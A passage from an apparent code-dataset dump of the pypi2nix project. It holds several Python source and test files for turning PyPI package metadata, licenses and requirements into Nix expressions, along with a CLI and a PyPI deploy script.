(GPLv3+)\": \"licenses.gpl3Plus\",\n \"License :: OSI Approved :: GNU Lesser General Public License v2 (LGPLv2)\": \"licenses.lgpl2\",\n \"License :: OSI Approved :: GNU Lesser General Public License v2 or later (LGPLv2+)\": \"licenses.lgpl2Plus\",\n \"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)\": \"licenses.lgpl3\",\n \"License :: OSI Approved :: GNU Lesser General Public License v3 or later (LGPLv3+)\": \"licenses.lgpl3Plus\",\n \"License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)\": \"licenses.lgpl2\",\n \"License :: OSI Approved :: IBM Public License\": \"licenses.ipl10\",\n \"License :: OSI Approved :: Intel Open Source License\": None,\n \"License :: OSI Approved :: ISC License (ISCL)\": \"licenses.isc\",\n \"License :: OSI Approved :: Jabber Open Source License\": None,\n \"License :: OSI Approved :: MIT License\": \"licenses.mit\",\n \"License :: OSI Approved :: MITRE Collaborative Virtual Workspace License (CVW)\": None,\n \"License :: OSI Approved :: Motosoto License\": None,\n \"License :: OSI Approved :: Mozilla Public License 1.0 (MPL)\": \"licenses.mpl10\",\n \"License :: OSI Approved :: Mozilla Public License 1.1 (MPL 1.1)\": \"licenses.mpl11\",\n \"License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)\": \"licenses.mpl20\",\n \"License :: OSI Approved :: Nethack General Public License\": None,\n \"License :: OSI Approved :: Nokia 
Open Source License\": None,\n \"License :: OSI Approved :: Open Group Test Suite License\": None,\n \"License :: OSI Approved :: Python License (CNRI Python License)\": None,\n \"License :: OSI Approved :: Python Software Foundation License\": \"licenses.psfl\",\n \"License :: OSI Approved :: Qt Public License (QPL)\": None,\n \"License :: OSI Approved :: Ricoh Source Code Public License\": None,\n \"License :: OSI Approved :: Sleepycat License\": \"licenses.sleepycat\",\n \"License :: OSI Approved :: Sun Industry Standards Source License (SISSL)\": None,\n \"License :: OSI Approved :: Sun Public License\": None,\n \"License :: OSI Approved :: University of Illinois/NCSA Open Source License\": \"licenses.ncsa\",\n \"License :: OSI Approved :: Vovida Software License 1.0\": \"licenses.vsl10\",\n \"License :: OSI Approved :: W3C License\": \"licenses.w3c\",\n \"License :: OSI Approved :: X.Net License\": None,\n \"License :: OSI Approved :: zlib/libpng License\": \"licenses.zlib\",\n \"License :: OSI Approved :: Zope Public License\": \"licenses.zpl21\",\n \"License :: Other/Proprietary License\": None,\n \"License :: Public Domain\": \"licenses.publicDomain\",\n \"License :: Repoze Public License\": None,\n}\n\n\ndef escape_regex(text: str) -> str:\n return re.escape(text)\n\n\nLICENSE_PATTERNS: Dict[str, List[str]] = {\n \"licenses.zpl21\": list(\n map(escape_regex, [\"LGPL with exceptions or ZPL\", \"ZPL 2.1\"])\n ),\n \"licenses.bsd3\": list(map(escape_regex, [\"3-Clause BSD License\", \"BSD-3-Clause\"])),\n \"licenses.mit\": list(\n map(\n escape_regex,\n [\n \"MIT\",\n \"MIT License\",\n \"MIT or Apache License, Version 2.0\",\n \"The MIT License\",\n \"Expat license\",\n \"MIT license\",\n ],\n )\n ),\n \"licenses.bsdOriginal\": list(\n map(\n escape_regex,\n [\"BSD\", \"BSD License\", \"BSD-like\", \"BSD or Apache License, Version 2.0\"],\n )\n )\n + [\"BSD -.*\"],\n \"licenses.asl20\": list(\n map(\n escape_regex,\n [\n \"Apache 2.0\",\n \"Apache License 2.0\",\n \"Apache 2\",\n \"Apache License, Version 2.0\",\n \"Apache License Version 2.0\",\n \"http://www.apache.org/licenses/LICENSE-2.0\",\n ],\n )\n ),\n \"licenses.lgpl3\": list(\n map(\n escape_regex,\n [\"GNU Lesser General Public License (LGPL), Version 3\", \"LGPL\"],\n )\n ),\n \"licenses.lgpl3Plus\": list(map(escape_regex, [\"LGPLv3+\"])),\n \"licenses.mpl20\": list(\n map(\n escape_regex,\n [\"MPL2\", \"MPL 2.0\", \"MPL 2.0 (Mozilla Public License)\", \"MPL-2.0\"],\n )\n ),\n \"licenses.psfl\": list(map(escape_regex, [\"Python Software Foundation License\"])),\n \"licenses.gpl2\": list(map(escape_regex, [\"GPL version 2\"])),\n}\n\n\ndef recognized_nix_license_from_classifiers(classifiers: List[str],) -> Optional[str]:\n license_classifiers = [i for i in classifiers if i in all_classifiers]\n for license_classifier in license_classifiers:\n license_nix = all_classifiers[license_classifier]\n if license_nix is not None:\n return license_nix\n return None\n\n\ndef first_license_classifier_from_list(classifiers: List[str]) -> Optional[str]:\n for classifier in classifiers:\n if classifier in all_classifiers:\n escaped_classifier: str = escape_string(classifier)\n return '\"' + escaped_classifier + '\"'\n return None\n\n\ndef license_from_string(license_string: str) -> Optional[str]:\n for nix_license, license_patterns in LICENSE_PATTERNS.items():\n for pattern in license_patterns:\n if re.match(\"^\" + pattern + \"$\", license_string):\n return nix_license\n return None\n\n\ndef find_license(classifiers: List[str], 
license_string: str) -> Optional[str]:\n return (\n recognized_nix_license_from_classifiers(classifiers)\n or license_from_string(license_string)\n or first_license_classifier_from_list(classifiers)\n )\n" }, { "alpha_fraction": 0.6182460188865662, "alphanum_fraction": 0.6191877722740173, "avg_line_length": 34.8438835144043, "blob_id": "791c9fbed5c94d5a3ead9bc24db82fb655b39384", "content_id": "881304f93a54de0fe4ef89a3fb6ebb3af1c8bb08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8495, "license_type": "no_license", "max_line_length": 105, "num_lines": 237, "path": "/src/pypi2nix/wheel.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import email.parser\nimport os.path\nfrom email.header import Header\nfrom email.message import Message\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\n\nimport click\nfrom packaging.utils import canonicalize_name\n\nfrom pypi2nix.license import find_license\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.nix_language import escape_string\nfrom pypi2nix.package import HasBuildDependencies\nfrom pypi2nix.package import HasRuntimeDependencies\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\n\nclass Wheel(HasRuntimeDependencies, HasBuildDependencies):\n def __init__(\n self,\n name: str,\n version: str,\n deps: RequirementSet,\n homepage: str,\n license: str,\n description: str,\n build_dependencies: RequirementSet,\n target_platform: TargetPlatform,\n ):\n self.name = canonicalize_name(name)\n self.version = version\n self._deps = deps\n self.homepage = homepage\n self.license = license\n self.description = description\n self._build_dependencies: RequirementSet = build_dependencies\n self._target_platform = target_platform\n self.package_format: str = \"setuptools\"\n\n def to_dict(self) -> Dict[str, Any]:\n return {\n \"name\": self.name,\n \"version\": self.version,\n \"deps\": [requirement.name() for requirement in self._deps],\n \"homepage\": self.homepage,\n \"license\": self.license,\n \"description\": self.description,\n \"build_dependencies\": [\n requirement.name() for requirement in self._build_dependencies\n ],\n }\n\n def build_dependencies(self, target_platform: TargetPlatform) -> RequirementSet:\n if target_platform != self._target_platform:\n return RequirementSet(target_platform)\n else:\n return self._build_dependencies\n\n def runtime_dependencies(self, target_platform: TargetPlatform) -> RequirementSet:\n if target_platform != self._target_platform:\n return RequirementSet(target_platform)\n else:\n return self.dependencies([])\n\n def dependencies(self, extras: List[str] = []) -> RequirementSet:\n return self._deps.filter(\n lambda requirement: requirement.applies_to_target(\n self._target_platform, extras=extras\n )\n )\n\n def add_build_dependencies(self, dependencies: RequirementSet) -> None:\n self._build_dependencies += dependencies\n\n @classmethod\n def from_wheel_directory_path(\n wheel_class,\n wheel_directory_path: str,\n target_platform: TargetPlatform,\n logger: Logger,\n requirement_parser: RequirementParser,\n ) -> \"Wheel\":\n builder = Builder(\n target_platform, wheel_directory_path, logger, requirement_parser\n )\n return builder.build()\n\n def target_platform(self) -> TargetPlatform:\n return self._target_platform\n\n\nclass Builder:\n def __init__(\n self,\n 
target_platform: TargetPlatform,\n wheel_directory_path: str,\n logger: Logger,\n requirement_parser: RequirementParser,\n ) -> None:\n self.name: Optional[str] = None\n self.version: Optional[str] = None\n self.target_platform = target_platform\n self.runtime_dependencies: RequirementSet = RequirementSet(target_platform)\n self.homepage: Optional[str] = None\n self.license: Optional[str] = None\n self.description: Optional[str] = None\n self.build_dependencies = RequirementSet(target_platform)\n self.wheel_directory_path: str = wheel_directory_path\n self.logger = logger\n self.requirement_parser = requirement_parser\n self.pkg_info: Message = self._parse_pkg_info()\n\n def build(self) -> \"Wheel\":\n self._get_name()\n self._get_version()\n self._get_runtime_dependencies()\n self._get_homepage()\n self._get_license()\n self._get_description()\n return self._verify_integrity()\n\n def _verify_integrity(self) -> \"Wheel\":\n if self.version is None:\n raise Exception(\n f\"Could not extract version from wheel metadata for `{self.name}`\"\n )\n if self.name is None:\n raise Exception(\n f\"Could not extract name info from metadata for package at `{self.wheel_directory_path}`\"\n )\n if self.homepage is None:\n raise Exception(\n f\"Could not extract homepage information from metadata for package `{self.name}`\"\n )\n if self.license is None:\n raise Exception(\n f\"Could not extract license information from metadata for package `{self.name}`\"\n )\n if self.description is None:\n raise Exception(\n f\"Could not extract description from metadata for package `{self.name}`\"\n )\n return Wheel(\n name=self.name,\n version=self.version,\n target_platform=self.target_platform,\n deps=self.runtime_dependencies,\n build_dependencies=self.build_dependencies,\n homepage=self.homepage,\n license=self.license,\n description=self.description,\n )\n\n def _parse_pkg_info(self) -> Message:\n metadata_file = os.path.join(self.wheel_directory_path, \"METADATA\")\n if os.path.exists(metadata_file):\n with open(\n metadata_file, \"r\", encoding=\"ascii\", errors=\"surrogateescape\"\n ) as headers:\n return email.parser.Parser().parse(headers)\n else:\n raise click.ClickException(\n f\"Unable to find METADATA in `{self.wheel_directory_path}` folder.\"\n )\n\n def _get_name(self) -> None:\n self.name = str_from_message(self.pkg_info, \"name\")\n if self.name is None:\n raise Exception(\n f\"Could not extract name from wheel metadata at {self.wheel_directory_path}\"\n )\n self.name = canonicalize_name(self.name)\n\n def _get_version(self) -> None:\n self.version = str_from_message(self.pkg_info, \"version\")\n\n def _get_license(self) -> None:\n license_string = str_from_message(self.pkg_info, \"license\")\n if license_string is None:\n license_string = \"\"\n classifiers = list_from_message(self.pkg_info, \"Classifier\")\n if classifiers is None:\n classifiers = []\n self.license = find_license(\n classifiers=classifiers, license_string=license_string\n )\n\n if self.license is None:\n self.license = '\"' + escape_string(license_string) + '\"'\n self.logger.warning(\n f\"Couldn't recognize license `{license_string}` for `{self.name}`\"\n )\n\n def _get_description(self) -> None:\n self.description = str_from_message(self.pkg_info, \"summary\")\n if self.description is None:\n self.description = \"\"\n\n def _get_runtime_dependencies(self) -> None:\n dependencies = list_from_message(self.pkg_info, \"requires-dist\")\n if dependencies is None:\n dependencies = []\n for dep_string in dependencies:\n dependency = 
self.requirement_parser.parse(dep_string)\n if not self._is_valid_dependency(dependency.name()):\n continue\n self.runtime_dependencies.add(dependency)\n\n def _is_valid_dependency(self, dependency_name: str) -> bool:\n canonicalized_dependency = canonicalize_name(dependency_name)\n return canonicalized_dependency != self.name\n\n def _get_homepage(self) -> None:\n self.homepage = str_from_message(self.pkg_info, \"home-page\")\n if not self.homepage:\n self.homepage = \"\"\n\n\ndef str_from_message(metadata: Message, key: str) -> Optional[str]:\n maybe_value = metadata.get(key)\n if isinstance(maybe_value, str):\n return maybe_value\n else:\n return None\n\n\ndef list_from_message(metadata: Message, key: str) -> Optional[List[str]]:\n maybe_value = metadata.get_all(key)\n if isinstance(maybe_value, list):\n return [str(item) if isinstance(item, Header) else item for item in maybe_value]\n else:\n return None\n" }, { "alpha_fraction": 0.6496945023536682, "alphanum_fraction": 0.6496945023536682, "avg_line_length": 27.882352828979492, "blob_id": "00ba04b567856d44cc2bf03f2079335a8294a4a4", "content_id": "9911de0628b5ed8d35fe31a8362d9f569ba551a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 491, "license_type": "no_license", "max_line_length": 64, "num_lines": 17, "path": "/src/pypi2nix/memoize.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from functools import wraps\nfrom typing import Callable\nfrom typing import TypeVar\n\nS = TypeVar(\"S\")\nT = TypeVar(\"T\")\n\n\ndef memoize(method: Callable[[S], T]) -> Callable[[S], T]:\n @wraps(method)\n def wrapped_method(self: S) -> T:\n attribute_name = \"_memoize_attribute_\" + method.__name__\n if not hasattr(self, attribute_name):\n setattr(self, attribute_name, method(self))\n return getattr(self, attribute_name) # type: ignore\n\n return wrapped_method\n" }, { "alpha_fraction": 0.7162403464317322, "alphanum_fraction": 0.7183224558830261, "avg_line_length": 30.420560836791992, "blob_id": "a365d30a479f5a2dacbd16681b98096953adc917", "content_id": "a5b31b91673a93f073ea4d5976d64a9229223485", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3362, "license_type": "permissive", "max_line_length": 82, "num_lines": 107, "path": "/unittests/pip/test_virtualenv_pip.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nimport venv\n\nimport pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import PipFailed\nfrom pypi2nix.pip import VirtualenvPip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\n\n@pytest.fixture\ndef pip_without_index(\n logger: Logger,\n current_platform: TargetPlatform,\n project_dir: str,\n wheel_distribution_archive_path: str,\n requirement_parser: RequirementParser,\n) -> VirtualenvPip:\n pip = VirtualenvPip(\n logger=logger,\n target_platform=current_platform,\n target_directory=os.path.join(project_dir, \"pip-without-index-venv\"),\n env_builder=venv.EnvBuilder(with_pip=True),\n no_index=True,\n wheel_distribution_path=wheel_distribution_archive_path,\n requirement_parser=requirement_parser,\n )\n pip.prepare_virtualenv()\n return pip\n\n\n@pytest.fixture\ndef pip_from_data_directory(\n logger: Logger,\n current_platform: TargetPlatform,\n project_dir: str,\n 
wheel_distribution_archive_path: str,\n data_directory: str,\n requirement_parser: RequirementParser,\n) -> VirtualenvPip:\n pip = VirtualenvPip(\n logger=logger,\n target_platform=current_platform,\n target_directory=os.path.join(project_dir, \"pip-without-index-venv\"),\n env_builder=venv.EnvBuilder(with_pip=True),\n no_index=True,\n wheel_distribution_path=wheel_distribution_archive_path,\n find_links=[data_directory],\n requirement_parser=requirement_parser,\n )\n pip.prepare_virtualenv()\n return pip\n\n\ndef test_pip_without_index_cannot_download_six(\n pip_without_index: VirtualenvPip,\n download_dir: Path,\n requirement_parser: RequirementParser,\n current_platform: TargetPlatform,\n) -> None:\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six\"))\n with pytest.raises(PipFailed):\n pip_without_index.download_sources(requirements, download_dir)\n\n\ndef test_pip_without_index_cannot_be_prepared_without_wheel_supplied(\n logger: Logger,\n current_platform: TargetPlatform,\n project_dir: str,\n requirement_parser: RequirementParser,\n) -> None:\n pip = VirtualenvPip(\n logger=logger,\n target_platform=current_platform,\n target_directory=os.path.join(project_dir, \"pip-without-index-venv\"),\n env_builder=venv.EnvBuilder(with_pip=True),\n no_index=True,\n requirement_parser=requirement_parser,\n )\n with pytest.raises(PipFailed):\n pip.prepare_virtualenv()\n\n\ndef test_pip_with_data_directory_index_can_download_six(\n pip_from_data_directory: VirtualenvPip,\n download_dir: Path,\n requirement_parser: RequirementParser,\n current_platform: TargetPlatform,\n) -> None:\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six\"))\n pip_from_data_directory.download_sources(requirements, download_dir)\n\n\ndef test_that_set_environment_variable_undoes_changes_when_exiting(\n pip_without_index: VirtualenvPip,\n):\n old_environment = dict(os.environ)\n with pip_without_index._set_environment_variable({\"test\": \"definitly_unset\"}):\n pass\n assert dict(os.environ) == old_environment\n" }, { "alpha_fraction": 0.7635468244552612, "alphanum_fraction": 0.7668308615684509, "avg_line_length": 25.478260040283203, "blob_id": "827e7c8eb95c8f94aec2252260c577e95fa4049f", "content_id": "89e0edb200cad65d50ebcaa19dded25dcfd4f1b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 609, "license_type": "no_license", "max_line_length": 86, "num_lines": 23, "path": "/src/pypi2nix/package/interfaces.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from abc import ABCMeta\nfrom abc import abstractmethod\n\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\n\nclass HasBuildDependencies(metaclass=ABCMeta):\n @abstractmethod\n def build_dependencies(self, target_platform: TargetPlatform) -> RequirementSet:\n pass\n\n\nclass HasRuntimeDependencies(metaclass=ABCMeta):\n @abstractmethod\n def runtime_dependencies(self, target_platform: TargetPlatform) -> RequirementSet:\n pass\n\n\nclass HasPackageName(metaclass=ABCMeta):\n @abstractmethod\n def package_name(self) -> str:\n pass\n" }, { "alpha_fraction": 0.6573795080184937, "alphanum_fraction": 0.6612700819969177, "avg_line_length": 30.247058868408203, "blob_id": "fa5d6e74545d99f4f254a030c40f2dd50e10ad5e", "content_id": "c7763c0e1c4314085dc9ea1af6b9e35c9023f4cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 7968, "license_type": "no_license", "max_line_length": 111, "num_lines": 255, "path": "/src/pypi2nix/cli.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nfrom typing import List\nfrom typing import Optional\n\nimport click\n\nfrom pypi2nix.configuration import ApplicationConfiguration\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.logger import verbosity_from_int\nfrom pypi2nix.main import Pypi2nix\nfrom pypi2nix.network_file import NetworkFile\nfrom pypi2nix.overrides import FILE_URL\nfrom pypi2nix.overrides import Overrides\nfrom pypi2nix.overrides import OverridesGithub\nfrom pypi2nix.overrides import OverridesNetworkFile\nfrom pypi2nix.path import Path\nfrom pypi2nix.project_directory import PersistentProjectDirectory\nfrom pypi2nix.project_directory import ProjectDirectory\nfrom pypi2nix.project_directory import TemporaryProjectDirectory\nfrom pypi2nix.python_version import PythonVersion\nfrom pypi2nix.python_version import available_python_versions\nfrom pypi2nix.utils import args_as_list\nfrom pypi2nix.version import pypi2nix_version\n\n\n@click.command(\"pypi2nix\")\n@click.option(\"--version\", is_flag=True, help=\"Show version of pypi2nix\")\n@click.option(\"-v\", \"--verbose\", count=True)\n@click.option(\"-q\", \"--quiet\", count=True)\n@click.option(\n \"-I\",\n \"--nix-path\",\n multiple=True,\n default=None,\n help=\"Add a path to the Nix expression search path. This \"\n \"option may be given multiple times. See the NIX_PATH \"\n \"environment variable for information on the semantics \"\n \"of the Nix search path. Paths added through -I take \"\n \"precedence over NIX_PATH.\",\n)\n@click.option(\n \"--nix-shell\", required=False, default=None, help=\"Path to nix-shell executable.\"\n)\n@click.option(\n \"--basename\",\n required=False,\n default=\"requirements\",\n help=\"Basename which is used to generate files. 
By default \"\n \"it uses basename of provided file.\",\n)\n@click.option(\n \"-E\",\n \"--extra-build-inputs\",\n multiple=True,\n default=None,\n help=\"Extra build dependencies needed for installation of \"\n \"required python packages.\",\n)\n@click.option(\n \"--emit-extra-build-inputs/--no-emit-extra-build-inputs\",\n default=True,\n help=\"Put extra build dependencies (specified using -E) in generated output.\",\n)\n@click.option(\n \"-N\",\n \"--extra-env\",\n default=\"\",\n help=\"Extra environment variables needed for installation of \"\n \"required python packages.\"\n 'Example: \"LANG=en_US.UTF-8 FOO_OPTS=xyz\"',\n)\n@click.option(\n \"-T\", \"--enable-tests\", is_flag=True, help=\"Enable tests in generated packages.\"\n)\n@click.option(\n \"-V\",\n \"--python-version\",\n \"python_version_argument\",\n required=False,\n default=\"python3\",\n type=click.Choice(available_python_versions),\n show_default=True,\n help=\"Provide which python version we build for.\",\n)\n@click.option(\n \"-r\",\n \"--requirements\",\n required=False,\n default=[],\n multiple=True,\n type=click.Path(exists=True, file_okay=True, dir_okay=False, resolve_path=True),\n help=\"pip requirements.txt file\",\n)\n@click.option(\n \"--dependency-graph-output\",\n required=False,\n default=None,\n type=click.Path(file_okay=True, dir_okay=False, resolve_path=True),\n help=\"Output dependency graph to this location\",\n)\n@click.option(\n \"--dependency-graph-input\",\n required=False,\n default=None,\n type=FILE_URL,\n help=\"Base dependency tree to consume for pypi2nix\",\n)\n@click.option(\n \"-e\",\n \"--editable\",\n multiple=True,\n required=False,\n default=[],\n type=str,\n help=\"location/url to editable locations\",\n)\n@click.option(\n \"-s\",\n \"--setup-requires\",\n multiple=True,\n required=False,\n default=None,\n type=str,\n help=\"Extra Python dependencies needed before the installation \" \"to build wheels.\",\n)\n@click.option(\n \"-O\",\n \"--overrides\",\n multiple=True,\n required=False,\n type=FILE_URL,\n help=\"Extra expressions that override generated expressions \"\n + \"for specific packages\",\n)\n@click.option(\n \"--default-overrides/--no-default-overrides\",\n default=True,\n help='Apply overrides from \"nixpkgs-python\" (https://github.com/nix-community/pypi2nix-overrides)', # noqa\n)\n@click.option(\n \"-W\",\n \"--wheels-cache\",\n multiple=True,\n required=False,\n default=[],\n type=str,\n help=\"An url where trusted wheels are located. eg. 
https://travis.garbas.si/wheels-cache\", # noqa\n)\n@click.option(\n \"--build-directory\",\n default=None,\n type=click.Path(exists=True, file_okay=False, dir_okay=True, resolve_path=True),\n help=\" \".join(\n [\n \"WARNING: This option does not work, don't use it.\",\n \"Directory where pypi2nix stores all build artifacts,\",\n \"if not specified a temporary directory will be used\",\n ]\n ),\n)\ndef main(\n version: str,\n verbose: int,\n quiet: int,\n nix_shell: Optional[str],\n nix_path: List[str],\n basename: str,\n extra_build_inputs: List[str],\n emit_extra_build_inputs: bool,\n extra_env: str,\n enable_tests: bool,\n python_version_argument: str,\n requirements: List[str],\n editable: List[str],\n setup_requires: List[str],\n overrides: List[NetworkFile],\n default_overrides: bool,\n wheels_cache: List[str],\n build_directory: Optional[str],\n dependency_graph_output: Optional[str],\n dependency_graph_input: Optional[NetworkFile],\n) -> None:\n overrides_list: List[Overrides] = []\n if version:\n click.echo(pypi2nix_version)\n exit(0)\n verbosity = verbosity_from_int(verbose - quiet + DEFAULT_VERBOSITY)\n nix_executable_directory: Optional[str]\n if nix_shell is None:\n nix_executable_directory = None\n else:\n if not os.path.isfile(nix_shell):\n raise click.exceptions.UsageError(\n f\"Specified `nix-shell` executable `{nix_shell}` does not exist.\"\n )\n else:\n nix_executable_directory = os.path.dirname(os.path.abspath(nix_shell))\n overrides_list += [OverridesNetworkFile(network_file) for network_file in overrides]\n if default_overrides:\n overrides_list += tuple(\n [\n OverridesGithub(\n owner=\"nix-community\",\n repo=\"pypi2nix-overrides\",\n path=\"overrides.nix\",\n )\n ]\n )\n python_version = getattr(PythonVersion, python_version_argument, None)\n if python_version is None:\n raise click.exceptions.UsageError(\n f\"Python version `{python_version_argument}` not available\"\n )\n\n project_directory_context: ProjectDirectory = (\n TemporaryProjectDirectory()\n if build_directory is None\n else PersistentProjectDirectory(path=build_directory)\n )\n if dependency_graph_input:\n dependency_graph = DependencyGraph.deserialize(dependency_graph_input.fetch())\n else:\n dependency_graph = DependencyGraph()\n with project_directory_context as _project_directory:\n configuration = ApplicationConfiguration(\n emit_extra_build_inputs=emit_extra_build_inputs,\n enable_tests=enable_tests,\n extra_build_inputs=args_as_list(extra_build_inputs),\n extra_environment=extra_env,\n nix_executable_directory=nix_executable_directory,\n nix_path=nix_path,\n output_basename=basename,\n overrides=overrides_list,\n python_version=python_version,\n requirement_files=requirements,\n requirements=editable,\n setup_requirements=setup_requires,\n verbosity=verbosity,\n wheels_caches=wheels_cache,\n project_directory=Path(_project_directory),\n target_directory=os.getcwd(),\n dependency_graph_output_location=Path(dependency_graph_output)\n if dependency_graph_output\n else None,\n dependency_graph_input=dependency_graph,\n )\n Pypi2nix(configuration).run()\n\n\nDEFAULT_VERBOSITY = 1\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6537467837333679, "alphanum_fraction": 0.6692506670951843, "avg_line_length": 23.1875, "blob_id": "6be4dfc76eefa565a91a31660ed815c4becae8bb", "content_id": "e324452597f61d25b103e98e62400cf83e573816", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1161, "license_type": "no_license", 
"max_line_length": 78, "num_lines": 48, "path": "/scripts/deploy_to_pypi.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport argparse\nimport os\nimport shutil\nimport subprocess\n\nfrom pypi2nix.version import pypi2nix_version\n\n\ndef main():\n set_up_environment()\n args = parse_args()\n pypi_name = get_pypi_name_from_args(args)\n remove_old_build_artifacts()\n deploy_to(pypi_name)\n\n\ndef set_up_environment():\n os.putenv(\"SOURCE_DATE_EPOCH\", \"315532800\")\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"Deploy pypi2nix to pypi\")\n parser.add_argument(\"--production\", action=\"store_true\", default=False)\n return parser.parse_args()\n\n\ndef get_pypi_name_from_args(args):\n return \"pypi\" if args.production else \"test-pypi\"\n\n\ndef remove_old_build_artifacts():\n shutil.rmtree(\"src/pypi2nix.egg-info\", ignore_errors=True)\n\n\ndef deploy_to(pypi_name):\n subprocess.run([\"python\", \"setup.py\", \"sdist\", \"bdist_wheel\"], check=True)\n distribution_paths = [\n f\"dist/pypi2nix-{pypi2nix_version}.tar.gz\",\n f\"dist/pypi2nix-{pypi2nix_version}-py3-none-any.whl\",\n ]\n subprocess.run(\n [\"twine\", \"upload\", \"-r\", pypi_name] + distribution_paths, check=True\n )\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7073906660079956, "alphanum_fraction": 0.7088989615440369, "avg_line_length": 32.150001525878906, "blob_id": "f32cc3e693369f118dafb307ee2fc255cd00c90b", "content_id": "a33d555c4716bfe43c57389b96ca241fb17e316c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1326, "license_type": "permissive", "max_line_length": 76, "num_lines": 40, "path": "/unittests/test_project_directory.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nimport tempfile\n\nimport pytest\n\nfrom pypi2nix.project_directory import PersistentProjectDirectory\nfrom pypi2nix.project_directory import TemporaryProjectDirectory\n\n\n@pytest.fixture(params=(\"tempfile\", \"persistent\"))\ndef project_directory(request,):\n if request.param == \"tempfile\":\n yield TemporaryProjectDirectory()\n elif request.param == \"persistent\":\n with TemporaryProjectDirectory() as directory:\n yield PersistentProjectDirectory(path=directory)\n\n\ndef test_can_write_to_project_directory(project_directory):\n with project_directory as directory:\n file_path = os.path.join(directory, \"test.txt\")\n with open(file_path, \"w\") as f:\n f.write(\"test\")\n\n\ndef test_tempfile_project_directory_is_deleted_after_exception():\n with pytest.raises(Exception), TemporaryProjectDirectory() as directory:\n path = directory\n raise Exception()\n assert not os.path.exists(path)\n\n\ndef test_persistent_project_directory_is_not_deleted_on_exception():\n with tempfile.TemporaryDirectory() as directory:\n with pytest.raises(Exception), PersistentProjectDirectory(\n path=directory\n ) as _project_dir:\n project_directory = _project_dir\n raise Exception()\n assert os.path.exists(project_directory)\n" }, { "alpha_fraction": 0.5685716867446899, "alphanum_fraction": 0.571509838104248, "avg_line_length": 32.283912658691406, "blob_id": "6b4e0aeb0bbb55548a00070f0929433a97f4298f", "content_id": "87573f5f90ed8c83020fdb2e2c8c0e989e79880f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10551, "license_type": "no_license", "max_line_length": 106, "num_lines": 317, "path": 
"/src/pypi2nix/requirements.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from abc import ABCMeta\nfrom abc import abstractmethod\nfrom typing import Callable\nfrom typing import List\nfrom typing import Optional\nfrom typing import Set\nfrom typing import Tuple\nfrom urllib.parse import urlparse\n\nfrom attr import attrib\nfrom attr import attrs\nfrom attr import evolve\nfrom packaging.utils import canonicalize_name\n\nfrom pypi2nix.environment_marker import EnvironmentMarker\nfrom pypi2nix.environment_marker import MarkerEvaluationFailed\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.package_source import GitSource\nfrom pypi2nix.package_source import HgSource\nfrom pypi2nix.package_source import PackageSource\nfrom pypi2nix.package_source import PathSource\nfrom pypi2nix.package_source import UrlSource\nfrom pypi2nix.target_platform import TargetPlatform\n\n\nclass IncompatibleRequirements(Exception):\n pass\n\n\nclass Requirement(metaclass=ABCMeta):\n @abstractmethod\n def name(self) -> str:\n pass\n\n @abstractmethod\n def extras(self) -> Set[str]:\n pass\n\n @abstractmethod\n def add(\n self, other: \"Requirement\", target_platform: TargetPlatform\n ) -> \"Requirement\":\n pass\n\n @abstractmethod\n def source(self) -> Optional[PackageSource]:\n pass\n\n @abstractmethod\n def environment_markers(self) -> Optional[EnvironmentMarker]:\n pass\n\n @abstractmethod\n def logger(self) -> Logger:\n pass\n\n def applies_to_target(\n self, target_platform: TargetPlatform, extras: List[str] = []\n ) -> bool:\n environment_markers = self.environment_markers()\n try:\n return (\n True\n if environment_markers is None\n else environment_markers.applies_to_platform(target_platform, extras)\n )\n except MarkerEvaluationFailed as e:\n self.logger().warning(\n \"Could not evaluate environment marker `{marker}`. 
